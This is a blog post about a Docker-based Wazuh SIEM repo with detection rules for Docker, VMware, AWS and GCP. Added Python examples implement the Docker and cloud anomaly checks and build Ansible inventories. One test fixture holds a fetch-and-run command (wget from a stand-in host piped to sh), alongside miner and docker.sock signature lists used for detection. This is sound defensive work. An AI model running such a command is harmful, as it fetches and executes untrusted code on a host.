
How I built a production-ready Wazuh SIEM on Docker (with custom rules for VMware, AWS and GCP)

Most Wazuh tutorials stop at "here's how to spin up the containers." That's fine for a demo, but getting it to actually monitor your infrastructure — with meaningful alerts, automated agent deployment, and cloud integrations — is a different story.

I spent a few weeks assembling everything into a single repo: wazuh-docker-monitoring-platform. Here's what it includes and why I built each piece.

## The problem with most Wazuh setups

Out of the box, Wazuh gives you generic Linux alerts. Useful, but noisy. What I needed was:

- Detection rules tuned for Docker container abuse (privileged runs, suspicious mounts, crypto-mining)
- VMware vCenter monitoring — snapshot abuse, vMotion events, auth brute force
- AWS CloudTrail and GCP Audit Log anomalies mapped to Wazuh rules
- A way to deploy agents at scale without SSHing into 30 machines one by one
- Something that works in both a lab (4GB RAM) and production

## What the stack looks like

```
┌─────────────────────────────────┐
│ Wazuh Manager :1514 / :55000    │
│ Wazuh Indexer :9200             │
│ Wazuh Dashboard :5601           │
│ NGINX (optional reverse proxy)  │
└─────────────────────────────────┘
          ↑ agents on port 1514
Linux servers · Windows servers · Docker hosts · vCenter
          ↑ log forwarding
AWS CloudTrail (S3) · GCP Pub/Sub
```

Everything runs via docker compose. There's also a docker-compose.lab.yml overlay that cuts resource usage for testing.

## Custom detection rules

This is the part I'm most proud of. The rules/ directory has rules for:

### Docker (rules/docker/)

- Container exec events
- Privileged container creation
- Host namespace abuse (--pid=host, --network=host)
- Suspicious bind mounts (/etc, /var/run/docker.sock)
- Crypto-mining signatures

### VMware (rules/vmware/)

- VM power state changes
- Snapshot creation/deletion (ransomware indicator)
- Host disconnect events
- vCenter login brute force

### AWS

- IAM policy changes
- Security group opened to 0.0.0.0/0
- Console login without MFA
- CloudTrail disabled or deleted
- Public bucket created

### GCP

- Firewall rule opened to 0.0.0.0/0
- IAM policy changes
- Compute instance created outside allowed regions

## Ansible agent deployment

Instead of deploying agents manually, the repo includes Ansible playbooks that handle everything:

```bash
# Deploy to all Linux hosts in inventory
ansible-playbook -i inventories/production playbooks/deploy-linux-agent.yml

# Windows too (via WinRM)
ansible-playbook -i inventories/production playbooks/deploy-windows-agent.yml
```

There's also a network discovery script that scans a subnet, generates an Ansible inventory, and feeds it straight into the deployment pipeline:

```bash
make onboard SUBNET=10.0.0.0/24
```

One command: scan → discover → deploy agents → verify.

## Getting started

```bash
git clone https://github.com/GiulioSavini/wazuh-docker-monitoring-platform.git
cd wazuh-docker-monitoring-platform
make preflight          # validate Docker, kernel params, disk, ports
cp .env.example .env    # set your passwords
make init               # generate TLS certs
make deploy             # bring up the stack
```

Dashboard is at https://localhost:5601 in a few minutes.

## Lab vs production mode

Running this on a homelab with limited RAM? Use the lab overlay:

```bash
docker compose -f docker-compose.yml -f docker-compose.lab.yml up -d
```

It reduces the Wazuh Indexer heap and manager memory limits to fit on an 8GB machine.

## What's next

The repo roadmap includes:

- Wazuh cluster mode (multi-node manager)
- Kubernetes Helm chart
- SOAR integration (Shuffle / TheHive)
- Sigma rule auto-import
- Automated compliance dashboards (PCI-DSS, CIS)

If you're running VMware, Docker, or any cloud infrastructure and want proper security visibility without paying for a commercial SIEM, give it a try. PRs and rule contributions welcome.

→ github.com/GiulioSavini/wazuh-docker-monitoring-platform
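To make the Docker rule set above concrete, here is the same detection logic (privileged container, host namespace, sensitive bind mounts, docker.sock, miner signatures) written as plain Python over `docker inspect`-shaped documents. This is an added example, not code from the post or from the wazuh-docker-monitoring-platform repo: the field names follow the Docker Engine API, but the sensitive-path list, the mining signatures, the finding names and the Wazuh-style severity numbers are my assumptions, and both sample containers are constructed.

```python
"""Added example: Docker container-abuse checks over docker-inspect documents.
Not the repository's rules; lists and severities below are assumptions."""
from __future__ import annotations

# Host paths that hand a container a foothold on the host (assumed list).
SENSITIVE_MOUNT_PREFIXES = ("/etc", "/var/run/docker.sock", "/run/docker.sock",
                            "/proc", "/sys", "/boot", "/root")
HOST_NAMESPACE_FIELDS = ("PidMode", "NetworkMode", "IpcMode", "UTSMode")
# Strings typical of miner binaries and pool protocols (assumed signatures).
MINING_SIGNATURES = ("xmrig", "stratum+tcp://", "stratum+ssl://", "minerd", "cryptonight")
# Wazuh-style levels per finding (my assumption, not the repo's numbers).
SEVERITY = {"privileged_container": 12, "host_namespace": 10, "sensitive_mount": 10,
            "docker_socket_mount": 12, "crypto_mining": 13}


def _mount_sources(host_config: dict, mounts: list) -> list[str]:
    """Host-side path of every bind mount, from HostConfig.Binds ("src:dst[:opts]")
    and from the top-level Mounts array (Type == "bind"), de-duplicated in order."""
    sources = [b.split(":", 1)[0] for b in host_config.get("Binds") or []]
    sources += [m.get("Source", "") for m in mounts if m.get("Type") == "bind"]
    return list(dict.fromkeys(sources))


def _is_sensitive(path: str) -> bool:
    """Exact match or a child of a sensitive prefix; "/" itself is always sensitive."""
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_MOUNT_PREFIXES)


def check_container(inspect: dict) -> list[tuple[str, int, str]]:
    """Evaluate one inspect document. Returns (finding, level, detail) tuples."""
    hc = inspect.get("HostConfig", {})
    cfg = inspect.get("Config", {})
    findings: list[tuple[str, int, str]] = []

    if hc.get("Privileged"):
        findings.append(("privileged_container", SEVERITY["privileged_container"], "HostConfig.Privileged=true"))

    for field in HOST_NAMESPACE_FIELDS:  # --pid=host, --network=host, --ipc=host, --uts=host
        if hc.get(field) == "host":
            findings.append(("host_namespace", SEVERITY["host_namespace"], f"{field}=host"))

    for src in _mount_sources(hc, inspect.get("Mounts") or []):
        if src.endswith("docker.sock"):  # full control of the daemon, i.e. of the host
            findings.append(("docker_socket_mount", SEVERITY["docker_socket_mount"], src))
        elif _is_sensitive(src):
            findings.append(("sensitive_mount", SEVERITY["sensitive_mount"], src))

    # Miner indicators in image name, command or entrypoint.
    haystack = " ".join([cfg.get("Image", ""), *(cfg.get("Cmd") or []),
                         *(cfg.get("Entrypoint") or [])]).lower()
    for sig in MINING_SIGNATURES:
        if sig in haystack:
            findings.append(("crypto_mining", SEVERITY["crypto_mining"], sig))
            break
    return findings


def max_level(findings: list[tuple[str, int, str]]) -> int:
    """Highest level among the findings, 0 when there are none."""
    return max((lvl for _, lvl, _ in findings), default=0)


# Constructed sample: a "monitoring" container that is really a host takeover.
SAMPLE_BAD = {
    "Name": "/node-exporter",
    "Config": {"Image": "alpine:3.19",
               "Cmd": ["sh", "-c", "wget -O- http://example.invalid/xmrig | sh"]},
    "HostConfig": {"Privileged": True, "PidMode": "host", "NetworkMode": "bridge",
                   "Binds": ["/var/run/docker.sock:/var/run/docker.sock", "/etc:/host-etc:ro"]},
    "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                "Destination": "/var/run/docker.sock"}],
}
# Constructed sample: a benign web container with a read-only content mount.
SAMPLE_OK = {
    "Name": "/web",
    "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
    "HostConfig": {"Privileged": False, "NetworkMode": "bridge",
                   "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"}],
}

if __name__ == "__main__":
    for doc in (SAMPLE_BAD, SAMPLE_OK):
        for name, level, detail in check_container(doc):
            print(f"{doc['Name']}: level {level} {name} ({detail})")
```

Two points worth carrying over into real rules: docker.sock is scored separately from other sensitive paths because it is equivalent to root on the host, and bind sources are read from both `HostConfig.Binds` and `Mounts`, since a mount declared via `--mount` only shows up in the latter.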
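The AWS and GCP lists in the rules section name the anomalies but not how they are recognised. Here is the same set of checks as Python run over constructed records, covering both CloudTrail (IAM policy change, security group open to the world, console login without MFA, CloudTrail stopped or deleted, public bucket) and GCP Audit Log (firewall open to the world, IAM policy change, instance created outside allowed regions). This is an added example and not the repository's rule set: the field paths follow the CloudTrail record format and the GCP AuditLog payload, while the IAM method list, the allowed-region policy, the finding names and every sample record are my assumptions.

```python
"""Added example: CloudTrail and GCP Audit Log anomaly checks over constructed
records. Not the repository's rules; lists and policies below are assumptions."""
from __future__ import annotations

ANY_CIDR = {"0.0.0.0/0", "::/0"}
# IAM calls that change who can do what (assumed subset).
AWS_IAM_POLICY_EVENTS = {"PutUserPolicy", "PutRolePolicy", "PutGroupPolicy",
                         "AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy",
                         "CreatePolicy", "CreatePolicyVersion", "SetDefaultPolicyVersion"}
ALLOWED_GCP_REGIONS = {"europe-west1", "europe-west4"}  # assumed org policy


def _strings(obj):
    """Every string nested in a JSON-like value (CloudTrail wraps lists as {"items": [...]})."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings(v)


def _grants_everyone(obj) -> bool:
    """True if an ACL grant names AllUsers or a policy statement has Principal '*'."""
    if isinstance(obj, dict):
        p = obj.get("Principal")
        if p == "*" or (isinstance(p, dict) and p.get("AWS") == "*"):
            return True
        return any(_grants_everyone(v) for v in obj.values())
    if isinstance(obj, list):
        return any(_grants_everyone(v) for v in obj)
    return isinstance(obj, str) and "AllUsers" in obj


def check_cloudtrail(rec: dict) -> list[str]:
    src, name = rec.get("eventSource", ""), rec.get("eventName", "")
    params = rec.get("requestParameters") or {}
    out: list[str] = []
    if src == "iam.amazonaws.com" and name in AWS_IAM_POLICY_EVENTS:
        out.append("aws_iam_policy_change")
    if src == "ec2.amazonaws.com" and name == "AuthorizeSecurityGroupIngress":
        if any(s in ANY_CIDR for s in _strings(params)):
            out.append("aws_sg_open_to_world")
    if name == "ConsoleLogin" and (rec.get("responseElements") or {}).get("ConsoleLogin") == "Success":
        # SAML-federated logins appear as AssumedRole with MFAUsed "No" even when the IdP
        # enforced MFA, so only native IAM users and the root user are flagged here.
        identity = (rec.get("userIdentity") or {}).get("type")
        mfa = (rec.get("additionalEventData") or {}).get("MFAUsed")
        if identity in ("IAMUser", "Root") and mfa != "Yes":
            out.append("aws_console_login_no_mfa")
    if src == "cloudtrail.amazonaws.com" and name in ("StopLogging", "DeleteTrail"):
        out.append("aws_cloudtrail_disabled")
    if src == "s3.amazonaws.com" and name in ("PutBucketAcl", "PutBucketPolicy") and _grants_everyone(params):
        out.append("aws_public_bucket")
    return out


def check_gcp_audit(entry: dict) -> list[str]:
    pp = entry.get("protoPayload") or {}
    method, req = pp.get("methodName", ""), pp.get("request") or {}
    out: list[str] = []
    if method.endswith("SetIamPolicy"):
        out.append("gcp_iam_policy_change")
    if method.endswith(("compute.firewalls.insert", "compute.firewalls.patch", "compute.firewalls.update")):
        if any(r in ANY_CIDR for r in req.get("sourceRanges") or []):
            out.append("gcp_firewall_open_to_world")
    if method.endswith("compute.instances.insert"):
        # resourceName: projects/<p>/zones/<zone>/instances/<name>; region = zone minus "-a" suffix.
        parts = pp.get("resourceName", "").split("/")
        if "zones" in parts and parts.index("zones") + 1 < len(parts):
            region = parts[parts.index("zones") + 1].rsplit("-", 1)[0]
            if region not in ALLOWED_GCP_REGIONS:
                out.append(f"gcp_instance_outside_allowed_regions:{region}")
    return out


def classify(event: dict) -> list[str]:
    """Dispatch on record shape: CloudTrail carries eventSource, GCP entries carry protoPayload."""
    if "protoPayload" in event:
        return check_gcp_audit(event)
    if "eventSource" in event:
        return check_cloudtrail(event)
    return []


# Constructed sample records, one per anomaly.
SAMPLES = [
    {"eventSource": "ec2.amazonaws.com", "eventName": "AuthorizeSecurityGroupIngress",
     "requestParameters": {"groupId": "sg-0123", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
          "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "responseElements": {"ConsoleLogin": "Success"}, "additionalEventData": {"MFAUsed": "No"}},
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
     "requestParameters": {"name": "arn:aws:cloudtrail:eu-west-1:123456789012:trail/main"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketPolicy",
     "requestParameters": {"bucketName": "backups", "bucketPolicy": {"Statement": [
         {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::backups/*"}]}}},
    {"protoPayload": {"serviceName": "compute.googleapis.com", "methodName": "v1.compute.firewalls.insert",
                      "resourceName": "projects/demo/global/firewalls/allow-all",
                      "request": {"sourceRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "tcp", "ports": ["3389"]}]}}},
    {"protoPayload": {"serviceName": "compute.googleapis.com", "methodName": "v1.compute.instances.insert",
                      "resourceName": "projects/demo/zones/us-central1-a/instances/vm-1", "request": {}}},
    {"protoPayload": {"serviceName": "cloudresourcemanager.googleapis.com", "methodName": "SetIamPolicy",
                      "resourceName": "projects/demo", "request": {}}},
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLES, 1):
        print(i, classify(ev))
```

The MFA check is the one most often written wrong: matching only on `MFAUsed != "Yes"` pages on every SAML-federated login, so the example restricts it to `IAMUser` and `Root` identities. Likewise the security-group check walks `requestParameters` rather than hard-coding the `ipPermissions.items[].ipRanges.items[].cidrIp` path, which also catches the IPv6 `::/0` form.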
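The onboarding pipeline is described as scan → discover → deploy agents → verify, with the discovery step producing an Ansible inventory. As an added example of that middle step, and not the repository's own discovery script, here is how scan results can be turned into an INI inventory that separates SSH-reachable Linux hosts from WinRM-reachable Windows hosts and keeps everything else in an `unmanaged` group for a human to look at. The scan data is constructed, and the group names, user names and WinRM variables are my assumptions.

```python
"""Added example: port-scan results -> Ansible INI inventory for agent rollout.
Not the repository's script; scan data and inventory conventions are assumptions."""
from __future__ import annotations
import ipaddress

SSH_PORT = 22
WINRM_PORTS = {5985: "http", 5986: "https"}  # WinRM port -> scheme


def classify_host(open_ports: set[int]) -> str | None:
    """SSH wins over WinRM: a host exposing both is managed as Linux."""
    if SSH_PORT in open_ports:
        return "linux"
    if WINRM_PORTS.keys() & open_ports:
        return "windows"
    return None


def build_inventory(scan: dict[str, set[int]], subnet: str) -> dict[str, list[str]]:
    """scan maps IP -> open ports. Only addresses inside subnet are kept, in address
    order; hosts with neither SSH nor WinRM land in 'unmanaged'."""
    net = ipaddress.ip_network(subnet, strict=False)
    groups: dict[str, list[str]] = {"linux": [], "windows": [], "unmanaged": []}
    for ip in sorted(scan, key=ipaddress.ip_address):
        if ipaddress.ip_address(ip) not in net:
            continue  # never onboard something the scan wandered into outside the target range
        groups[classify_host(scan[ip]) or "unmanaged"].append(ip)
    return groups


def render_ini(groups: dict[str, list[str]], scan: dict[str, set[int]],
               ssh_user: str = "ansible", winrm_user: str = "Administrator") -> str:
    """Render Ansible INI. Windows hosts get ansible_port per host: 5986 (HTTPS) when
    open, else 5985; Ansible defaults the WinRM scheme to http only for port 5985."""
    win = [f"{ip} ansible_port={5986 if 5986 in scan[ip] else 5985}" for ip in groups["windows"]]
    lines = [
        "[linux]", *groups["linux"], "",
        "[linux:vars]", f"ansible_user={ssh_user}", "",
        "[windows]", *win, "",
        "[windows:vars]", "ansible_connection=winrm", f"ansible_user={winrm_user}",
        "ansible_winrm_transport=ntlm", "",
        "[wazuh_agents:children]", "linux", "windows", "",
        "# unmanaged (no SSH/WinRM): " + ", ".join(groups["unmanaged"]),
    ]
    return "\n".join(lines) + "\n"


# Constructed scan output: IP -> open TCP ports.
SCAN = {
    "10.0.0.5": {22, 80},
    "10.0.0.12": {135, 445, 5985},
    "10.0.0.20": {443},           # neither SSH nor WinRM: needs a human
    "10.0.0.7": {22, 5985},       # both open: SSH wins
    "10.0.0.30": {445, 5986},     # WinRM over HTTPS
    "192.168.1.9": {22},          # outside the subnet: ignored
}

if __name__ == "__main__":
    groups = build_inventory(SCAN, "10.0.0.0/24")
    print(render_ini(groups, SCAN), end="")
```

Feeding the rendered file to `ansible-playbook -i <file> playbooks/deploy-linux-agent.yml` and the Windows playbook is then a matter of passing the right group. Note that the subnet filter is a deliberate guard: a discovery scan that reaches beyond the range you asked for should not silently turn into agents being pushed to hosts you do not own.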